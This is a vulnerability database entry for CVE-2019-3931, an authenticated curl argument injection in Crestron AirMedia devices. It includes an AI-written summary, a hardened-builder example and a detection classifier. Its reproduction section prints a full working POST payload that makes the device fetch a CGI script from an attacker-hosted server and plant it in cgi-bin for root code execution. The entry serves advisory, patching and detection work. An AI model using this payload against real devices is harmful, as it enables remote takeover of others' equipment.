CVE-2019-3931
Description
Crestron AM-100 with firmware 1.6.0.2 and AM-101 with firmware 2.7.0.2 are vulnerable to argument injection to the curl binary via crafted HTTP requests to return.cgi. A remote, authenticated attacker can use this vulnerability to upload files to the device and ultimately execute code as root.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
An authenticated argument injection into the curl invocation made by return.cgi on Crestron AM-100 and AM-101 lets an attacker upload files to the device and execute arbitrary code as root.
Vulnerability
Crestron AM-100 with firmware 1.6.0.2 and AM-101 with firmware 2.7.0.2 are vulnerable to argument injection into the curl binary through crafted HTTP requests to the return.cgi script. A remote, authenticated attacker can exploit this to upload arbitrary files to the device and execute code with root privileges [1].
Exploitation
An attacker must first authenticate to the web interface of the device. The attacker then sends a specially crafted HTTP request to the return.cgi endpoint that injects extra arguments into the call to the curl binary. The injected arguments allow the attacker to control file upload operations and subsequently achieve code execution [1].
Impact
Successful exploitation enables a remote, authenticated attacker to upload files to the device and execute arbitrary commands as the root user, resulting in full compromise of the device's confidentiality, integrity, and availability [1].
Mitigation
The vendor has not released a firmware update addressing this vulnerability as of the publication date. Users should restrict network access to the affected devices and change default credentials to limit the risk of exploitation until a patch is applied [1].
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
Crestron / Crestron AirMedia v5 Range: AM-100 firmware 1.6.0.2 and AM-101 firmware 2.7.0.2
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"Insufficient sanitization of user-supplied parameters passed to the curl binary allows argument injection via a semicolon separator in the upload address field."
Attack vector
An authenticated attacker sends a crafted HTTP POST request to `/cgi-bin/return.cgi` with a `command` XML payload containing an `upload` element [ref_id=1]. The `address` field in the payload includes a semicolon (`;`) followed by arbitrary `curl` arguments, such as `-o` to specify an output path [ref_id=1]. This causes the device to execute `sh /usr/bin/curl -k -o /tmp/Example.ogg http://attacker-ip:port; http://attacker-ip:port/lol.cgi -o /home/boa/cgi-bin/file_transfer.cgi`, uploading a malicious CGI script to the writable cgi-bin directory [ref_id=1]. The attacker can then trigger the uploaded script to achieve remote code execution as root [ref_id=1].
Affected code
The vulnerability resides in the `/home/boa/cgi-bin/return.cgi` CGI script on Crestron AM-100 (firmware 1.6.0.2) and AM-101 (firmware 2.7.0.2) [ref_id=1]. The script passes attacker-controlled parameters to the `curl` binary without sufficient sanitization [ref_id=1]. The `/home/boa/cgi-bin/` directory is writable, enabling file overwrite [ref_id=1].
What the fix does
The advisory does not include a patch diff or describe the specific fix applied [ref_id=1]. It notes that a prior patch (for CVE-2017-16709) attempted to filter OS commands but failed to block arbitrary parameters to `curl` [ref_id=1]. The recommended remediation would require properly sanitizing or whitelisting the parameters passed to `curl` in the `return.cgi` script, preventing argument injection via the `address` field [ref_id=1]. No updated firmware version is identified as fixing this specific CVE in the advisory [ref_id=1].
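The following is an added example, not Crestron's code or the advisory's: it models the pattern the advisory describes (a curl command line assembled from the `address` field and handed to sh) next to a hardened builder. The real return.cgi source is not public, so `legacy_filter` is a hypothetical stand-in for a CVE-2017-16709-style metacharacter filter; it is there to show why neutralising shell metacharacters alone does not stop argument injection, since whitespace still splits the value into extra curl arguments. The output path `/tmp/Example.ogg` and the sample payload follow the advisory; everything else is assumed.

```python
"""Argument injection into curl: vulnerable string-building vs. an argv-based fix.
Added example; the CGI logic and the legacy filter are reconstructions, not
Crestron's code.
"""
import re
import shlex
import subprocess
from urllib.parse import urlsplit

OUTPUT_PATH = "/tmp/Example.ogg"  # fixed download target named in the advisory


def legacy_filter(address: str) -> str:
    """Hypothetical metacharacter filter (assumption, not the real patch).

    Escaping ; & | etc. stops sh from starting a second command, but the
    value is still word-split, so curl receives the injected tokens as argv.
    """
    return re.sub(r"([;&|`$<>])", r"\\\1", address)


def vulnerable_command(address: str) -> str:
    """Reconstructed command string the vulnerable CGI would pass to sh."""
    return f"/usr/bin/curl -k -o {OUTPUT_PATH} {legacy_filter(address)}"


def curl_argv_seen(address: str) -> list:
    """argv curl ends up with after POSIX word-splitting of the command."""
    return shlex.split(vulnerable_command(address))


def injected_outputs(address: str) -> list:
    """All -o destinations curl receives; more than one means injection."""
    argv = curl_argv_seen(address)
    return [argv[i + 1] for i, a in enumerate(argv) if a == "-o" and i + 1 < len(argv)]


_ALLOWED_SCHEMES = {"http", "https", "ftp"}


def safe_argv(address: str) -> list:
    """Hardened builder: accept exactly one plain URL, then pass it as a single
    argv element after '--' so curl cannot read it as an option. No shell."""
    if not address or any(c.isspace() for c in address) or address.startswith("-"):
        raise ValueError("address contains whitespace or looks like an option")
    parts = urlsplit(address)
    if parts.scheme not in _ALLOWED_SCHEMES or not parts.hostname:
        raise ValueError("address is not a plain http/https/ftp URL")
    return ["/usr/bin/curl", "-k", "-o", OUTPUT_PATH, "--", address]


def is_safe_address(address: str) -> bool:
    """True if the hardened builder would accept the address."""
    try:
        safe_argv(address)
    except ValueError:
        return False
    return True


def run_safe(address: str) -> subprocess.CompletedProcess:
    """shell=False: the list goes straight to execve and is never word-split."""
    return subprocess.run(safe_argv(address), check=False, capture_output=True)


if __name__ == "__main__":
    PAYLOAD = ("http://192.168.88.248:1270; http://192.168.88.248:1270/lol.cgi "
               "-o /home/boa/cgi-bin/file_transfer.cgi")
    print("vulnerable argv:", curl_argv_seen(PAYLOAD))
    print("-o targets:", injected_outputs(PAYLOAD))
    print("hardened accepts payload:", is_safe_address(PAYLOAD))
    print("hardened argv:", safe_argv("http://192.168.88.248:1270/logo.png"))
```

The useful check is `injected_outputs`: with the advisory's payload it returns two `-o` targets, the second being `/home/boa/cgi-bin/file_transfer.cgi`, even though the semicolon was escaped. The fix rejects any value that is not a single URL and never lets a shell see the string; the `--` is belt-and-braces for a value that survives validation but begins with a dash.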
Preconditions
- auth: Attacker must have valid authentication credentials for the device's web interface
- network: Attacker must have network access to the device's HTTPS management interface (typically port 443)
- network: Attacker must host a server reachable by the device to serve the malicious CGI file
Reproduction
Send a crafted POST request to `/cgi-bin/return.cgi` with the following payload (replace IP addresses and session ID as appropriate):
```
curl --header "Content-Type: application/x-www-form-urlencoded" \
  --request POST \
  --data "command=<Send><seid>fAEI0CHTDTHKcDVD</seid><upload><protocol>ftp</protocol><address>http://192.168.88.248:1270; http://192.168.88.248:1270/lol.cgi -o /home/boa/cgi-bin/file_transfer.cgi</address><port>1270</port><account>lol</account><password>lol</password><logo>/tmp/wat</logo></upload></Send>" \
  --insecure https://192.168.88.250/cgi-bin/return.cgi
```
This causes the device to execute `curl` with injected arguments, downloading `lol.cgi` from the attacker's server and writing it to `/home/boa/cgi-bin/file_transfer.cgi` [ref_id=1].
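For detection, here is an added example (not part of the advisory) that inspects a POST body of the shape shown above, pulls the `<upload><address>` value out of the `command` parameter, and reports why it looks like curl argument injection. The two request bodies are constructed for the example; the benign one is an assumed normal upload, and the malicious one mirrors the reproduction payload. The element names follow the advisory's payload; the heuristics are mine.

```python
"""Flag return.cgi upload requests whose <address> carries injected curl args.
Added example: the request bodies below are constructed, and the detection
rules are the author's, not Crestron's or Tenable's.
"""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

OPTION_TOKEN = re.compile(r"(^|\s)-{1,2}[A-Za-z]")
SHELL_META = re.compile(r"[;&|`$]")


def parse_form(body: str) -> Dict[str, str]:
    """Minimal x-www-form-urlencoded parser splitting on '&' only, so a ';'
    inside the payload is kept (older parse_qs versions split on ';' too)."""
    fields = {}
    for pair in body.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        fields[unquote_plus(key)] = unquote_plus(value)
    return fields


def extract_upload_address(body: str) -> Optional[str]:
    """Return <Send><upload><address> text, or None if absent/unparseable."""
    cmd = parse_form(body).get("command")
    if not cmd:
        return None
    try:
        # Untrusted XML: use defusedxml.ElementTree in production to avoid
        # entity-expansion attacks; the stdlib parser is used here to stay
        # self-contained.
        root = ET.fromstring(cmd)
    except ET.ParseError:
        return None
    node = root.find("./upload/address")
    return node.text if node is not None else None


def classify_address(address: str) -> List[str]:
    """Reasons an address value looks like curl argument injection."""
    reasons = []
    if any(c.isspace() for c in address):
        reasons.append("whitespace would split the value into extra argv entries")
    if OPTION_TOKEN.search(address):
        reasons.append("option-like token (-x or --long) present")
    if SHELL_META.search(address):
        reasons.append("shell metacharacter present")
    if "/home/boa/cgi-bin" in address or address.count("://") > 1:
        reasons.append("second URL or writable cgi-bin path embedded")
    return reasons


def inspect_request(body: str) -> dict:
    """Classify one request body; 'suspicious' is True when any rule fires."""
    address = extract_upload_address(body)
    reasons = classify_address(address) if address else []
    return {"address": address, "suspicious": bool(reasons), "reasons": reasons}


# Constructed sample: a plausible benign logo upload (assumed, not captured).
BENIGN = ("command=<Send><seid>abc123</seid><upload><protocol>ftp</protocol>"
          "<address>ftp://192.168.88.5/logo.png</address><port>21</port>"
          "<account>u</account><password>p</password><logo>/tmp/wat</logo>"
          "</upload></Send>")

# Constructed sample mirroring the reproduction payload's shape.
MALICIOUS = ("command=<Send><seid>fAEI0CHTDTHKcDVD</seid><upload><protocol>ftp"
             "</protocol><address>http://192.168.88.248:1270; "
             "http://192.168.88.248:1270/lol.cgi -o /home/boa/cgi-bin/file_transfer.cgi"
             "</address><port>1270</port><account>lol</account><password>lol"
             "</password><logo>/tmp/wat</logo></upload></Send>")

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, inspect_request(body))
```

The whitespace rule is the one that matters: a single URL never contains an unencoded space, so any space in `<address>` means curl will see more than one argument, regardless of whether a shell metacharacter is present. Run the classifier over web-server access logs or a reverse-proxy request capture in front of the device; note that the management interface is HTTPS, so the body is only visible where TLS is terminated.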
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1. www.tenable.com/security/research/tra-2019-20 (MITRE x_refsource_MISC)
News mentions
No linked articles in our index yet.